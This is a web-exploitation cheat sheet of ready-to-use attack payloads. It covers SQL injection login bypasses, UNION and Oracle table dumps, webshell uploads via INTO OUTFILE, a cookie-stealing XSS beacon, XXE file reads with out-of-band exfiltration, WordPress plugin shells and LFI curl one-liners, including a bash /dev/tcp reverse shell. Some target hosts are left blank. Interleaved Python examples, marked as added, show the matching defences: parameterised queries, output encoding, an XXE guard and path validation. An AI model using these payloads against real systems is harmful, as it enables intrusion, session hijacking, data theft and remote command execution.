# Web footholds

# Poison Null Byte

A null byte tells many string parsers that a string is complete, allowing us to bypass extension filters.

# SQL injection

Bypass examples

' or 1=1--       # Use this when username is not known
foo@bar.com'--   # Use this when username is known

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1 --
' or 1=1 -- -

NOTE: it can also be helpful to check whether any error messages show up by submitting a single quote (')

# Union Injection

A UNION injection adds a UNION statement to the query, letting us run an arbitrary query and append its results to the intended query's output. The injected SELECT must return the same number of columns as the original query, or it will error.

' UNION SELECT 1;-- -    # testing 1 column
' UNION SELECT 1,2;-- -  # testing 2 columns

Examples of what the query looks like on the server:

SELECT username from players where country = '[input]';                       # Typical query
SELECT username from players where country = '' UNION SELECT 1;-- -';         # Generic union injection testing 1 column
SELECT username from players where country = '' UNION SELECT user();-- -';    # Select database user

Upload webshell

' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" into OUTFILE '/var/www/html/webshell.php' -- -
' union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/webshell.php' -- -

Load file

union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
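The login bypass and the column-count rule above, reproduced as an added example (not code from the original notes) against a constructed SQLite table, together with the parameterised query that closes the hole. The table, rows and function names are assumptions made for the demo, and SQLite stands in for MySQL or Oracle; it rejects a mismatched UNION in the same way.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed in-memory login table; the two accounts are sample data for the demo.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (email, password) VALUES (?, ?)",
        [("alice@example.com", "s3cret"), ("foo@bar.com", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> list[str]:
    # String concatenation: the attacker's quote closes the literal and '--' comments out
    # the password check, so ' or 1=1-- matches every row and foo@bar.com'-- matches one.
    sql = f"SELECT email FROM users WHERE email = '{email}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> list[str]:
    # Parameter binding: values are sent separately from the statement text, so quotes
    # and comment markers are compared literally against the column and never parsed.
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (email, password)).fetchall()]


def probe_columns(conn: sqlite3.Connection, payload: str) -> tuple:
    # Feeds a UNION payload through the vulnerable query and reports whether the database
    # accepted it: a UNION whose column count differs from the original SELECT is an error
    # in SQLite, MySQL and Oracle alike, which is what column-count probing relies on.
    sql = f"SELECT email FROM users WHERE email = '{payload}' AND password = 'x'"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "' or 1=1--", "x"))                   # both accounts
    print(login_vulnerable(db, "foo@bar.com'--", "x"))               # ['foo@bar.com']
    print(login_safe(db, "' or 1=1--", "x"))                         # []
    print(probe_columns(db, "' UNION SELECT 1-- -"))                 # ('ok', [(1,)])
    print(probe_columns(db, "' UNION SELECT 1,2-- -"))               # ('error', ...)
    print(probe_columns(db, "' UNION SELECT sqlite_version()-- -"))  # like user() on MySQL
```

The only difference between the two login functions is where the user's text ends up: inside the statement grammar (vulnerable) or in a bound parameter (safe). Every payload on this page is inert against the bound version, which is why parameterised queries, not input filtering, are the fix.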

# Oracle Union Injection

Run through ORDER BY expressions to see how many columns are available:

' order by 1--
' order by 2--
' order by 3--
' order by 4--
Something went wrong with the search: java.sql.SQLSyntaxErrorException: ORA-01785: ORDER BY item must be the number of a SELECT-list expression 

Because ORDER BY 4 errors, we know the query has 3 columns.

' union select 1,2,3 from users--
' union select null,null,null from users--

Find which column is rendered in the page:

' union select '1111',null,null from users--
1111 with title null from 0

The first column is rendered, so use it to read the Oracle version:

' union select (select banner from v$version where rownum=1),null,null from users--
Oracle Database 18c Express Edition Release - Production with title null from 0

List the table names:

' union select table_name,null,null from all_tables--

List the column names of the users table:

' union select column_name,null,null from all_tab_columns where table_name='users'--
PASSWORD with title null from 0
USER_ID with title null from 0
USER_NAME with title null from 0

Dump the table by concatenating columns with '||':

' union select USER_NAME||PASSWORD,null,null from users--

# Stored XSS / session hijack

Stored XSS is the most dangerous type of XSS: the malicious string originates from the website's own database. It occurs when a website allows user input that is not sanitised to be inserted into the database and later rendered to other users.

Use XSS to send cookie information to a server you control.

<script>new Image().src=""+document.cookie;</script>

# Reflected XSS

The payload is part of the victim's request to the website, and the website includes the payload in its response back to the user. Example:

<script>alert("Hello World")</script>

# DOM-Based XSS

The structure of the page is changed on the client side: script already in the page writes attacker-controlled data into the DOM, so the server never sees the payload.

<script>document.querySelector('#title').textContent = 'I am a hacker'</script>
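An added example for the three XSS variants above (not code from the original notes): the stored cookie-beacon payload rendered with and without output encoding, plus an audit of the Set-Cookie flags that decide whether document.cookie can expose a session at all. The comment markup, cookie names and function names are assumptions for the demo.

```python
import html
import re

# Constructed sample of a stored comment: the cookie-beacon payload from the notes,
# with the collection URL left blank as it is there.
STORED_COMMENT = '<script>new Image().src=""+document.cookie;</script>'


def render_comment_unsafe(comment: str) -> str:
    # Raw interpolation: the stored string is delivered to every visitor as live markup.
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser shows the payload
    # as text instead of executing it. Apply this at output time for every untrusted value.
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def contains_script_markup(rendered: str) -> bool:
    # Coarse check for the assertions: is an executable <script> tag still present?
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


REQUIRED_COOKIE_FLAGS = ("HttpOnly", "Secure", "SameSite")


def missing_cookie_flags(set_cookie_value: str) -> list[str]:
    # Audits one Set-Cookie header value. HttpOnly stops document.cookie from exposing
    # the session cookie, which is exactly what the beacon payload above relies on.
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie_value.split(";")[1:]}
    return [flag for flag in REQUIRED_COOKIE_FLAGS if flag.lower() not in attrs]


if __name__ == "__main__":
    print(render_comment_unsafe(STORED_COMMENT))
    print(render_comment_safe(STORED_COMMENT))
    print(missing_cookie_flags("session=abc123; Path=/"))                                  # all three missing
    print(missing_cookie_flags("session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"))  # []
```

For the DOM-based case the same rule applies inside the browser: write untrusted data with textContent (as the notes' own DOM example does, which is why it changes only text) rather than innerHTML.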


# XXE (XML External Entity)

An XML External Entity attack targets an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Synack has a great writeup about this: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/

# In-band examples

Display arbitrary text (the entity is expanded wherever &example; appears in the body):

<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example "cookbook">]>
<replace>&example;</replace>

Reading a local file:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

# Out-of-band example

Note the &exfil; reference: it must appear somewhere in the XML body for the attack to work.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!ENTITY % sp SYSTEM "">

On the attacking machine, start a simple web server (python3 -m http.server 80) and craft a DTD file for use in the attack:

cat > dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM ';'>">

Watch for GET requests on the web server and base64-decode the exfiltrated data they carry.
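On the receiving side, an added example (not from the original notes) of the guard a defender puts in front of an XML parser for both the in-band and out-of-band cases above: it classifies a document by the DTD constructs it carries (internal entity, external SYSTEM entity, parameter entity) and refuses to parse anything with a DOCTYPE, since an application that never needs a DTD has no reason to accept one. The sample documents are constructed from the fragments in the notes, with the out-of-band URL left blank as it is there; the function names are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Indicators checked on the decoded request body before any parser sees it.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
INTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+\w+\s+[\"']", re.IGNORECASE)


def classify_xml(doc: str) -> str:
    """Returns 'clean', 'doctype', 'internal-entity', 'external-entity' or 'parameter-entity'."""
    if PARAM_ENTITY_RE.search(doc):
        return "parameter-entity"   # out-of-band pattern: <!ENTITY % sp SYSTEM "..."> pulling a remote DTD
    if EXTERNAL_ENTITY_RE.search(doc):
        return "external-entity"    # in-band file read: <!ENTITY read SYSTEM 'file:///...'>
    if INTERNAL_ENTITY_RE.search(doc):
        return "internal-entity"    # plain text substitution, but still a DTD
    if DOCTYPE_RE.search(doc):
        return "doctype"            # DOCTYPE without entities, e.g. an external DTD reference
    return "clean"


def parse_untrusted(doc: str) -> ET.Element:
    """Rejects any document carrying a DTD, then parses it with the standard library."""
    verdict = classify_xml(doc)
    if verdict != "clean":
        raise ValueError(f"rejected XML input: {verdict}")
    return ET.fromstring(doc)


# Constructed samples built from the fragments in the notes.
BENIGN_DOC = '<?xml version="1.0"?><order><item>cookbook</item></order>'
DOCTYPE_ONLY_DOC = '<?xml version="1.0"?><!DOCTYPE order SYSTEM "order.dtd"><order/>'
INTERNAL_ENTITY_DOC = ('<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "cookbook">]>'
                       '<replace>&example;</replace>')
EXTERNAL_ENTITY_DOC = ('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY read SYSTEM \'file:///etc/passwd\'>]>'
                       '<root>&read;</root>')
OOB_DOC = ('<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE data [<!ENTITY % sp SYSTEM "">]>'
           '<data>&exfil;</data>')

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_DOC), ("doctype", DOCTYPE_ONLY_DOC),
                      ("internal", INTERNAL_ENTITY_DOC), ("external", EXTERNAL_ENTITY_DOC),
                      ("oob", OOB_DOC)]:
        print(f"{name:9} -> {classify_xml(doc)}")
    print(parse_untrusted(BENIGN_DOC).tag)  # order
```

Run the classifier on the decoded text (after handling the declared encoding), and treat it as a logging and early-reject layer: the primary control is a parser configured with DTD processing and external entity resolution disabled, which the guard complements rather than replaces.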

# WordPress plugins

Zip up a robust PHP file as a plugin. Plugins are typically stored in the wp-content/plugins/ directory, so to execute your reverse shell after uploading, browse to something like the following:


# LFI (Local File Inclusion)

# PHP wrappers

PHP provides several protocol wrappers that can be used to exploit directory traversal and local file inclusion vulnerabilities.

<?php echo shell_exec("ls") ?>

curl -s --data "<?system('ls -la');?>" ""
curl -s --data "<?system('bash -i >& /dev/tcp/ 0>&1');?>" ""
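An added example (not from the original notes) that serves both the Poison Null Byte section at the top of the page and the LFI section here: a naive extension filter next to the C-string view that the null byte exploits, and a hardened stand-in for an include parameter that rejects NUL bytes, stream wrappers and traversal outside an allowed root. It is written in Python rather than PHP to keep it runnable here; the template root, allowed extensions and function names are assumptions for the demo.

```python
from pathlib import Path

# Constructed include root and allow-list; in a deployment these are the one directory
# and the file types the application is actually meant to include.
TEMPLATE_ROOT = Path("/var/www/app/templates")
ALLOWED_SUFFIXES = {".html", ".php"}


def naive_extension_check(name: str) -> bool:
    # The kind of filter a poison null byte defeats: it inspects the whole string tail...
    return name.lower().endswith(".jpg")


def as_seen_by_c_string_api(name: str) -> str:
    # ...while a C-string consumer (filesystem call, legacy runtime) stops at the first NUL,
    # so the part the filter approved is never seen by the code that opens the file.
    return name.split("\x00", 1)[0]


def resolve_include(user_value: str, root: Path = TEMPLATE_ROOT) -> Path:
    """Hardened stand-in for an include/template parameter.

    Rejects NUL bytes, PHP stream wrappers and URLs, any path that escapes the root
    after normalisation, and any extension outside the allow-list.
    """
    if "\x00" in user_value:
        raise ValueError("NUL byte in filename")
    lowered = user_value.lower()
    if "://" in lowered or lowered.startswith(("php:", "data:", "expect:", "phar:", "file:")):
        raise ValueError("stream wrapper or URL not allowed")
    root_resolved = root.resolve()
    # Joining an absolute user path discards the root, so the containment check below
    # is what actually enforces the boundary; resolve() collapses ../ and symlinks first.
    candidate = (root_resolved / user_value).resolve()
    if not candidate.is_relative_to(root_resolved):
        raise ValueError("path escapes include root")
    if candidate.suffix not in ALLOWED_SUFFIXES:
        raise ValueError("extension not allowed")
    return candidate


if __name__ == "__main__":
    poisoned = "shell.php\x00.jpg"
    print(naive_extension_check(poisoned))        # True: the filter is satisfied
    print(as_seen_by_c_string_api(poisoned))      # shell.php: what gets written or opened
    print(resolve_include("pages/about.php"))     # allowed
    for bad in (poisoned, "../../../../etc/passwd",
                "php://filter/convert.base64-encode/resource=index.php", "/etc/passwd"):
        try:
            resolve_include(bad)
        except ValueError as exc:
            print(f"rejected {bad!r}: {exc}")
```

The ordering matters: the NUL check comes first because every later step (lowercasing, path joining, suffix inspection) would otherwise reason about a string that the filesystem will silently truncate.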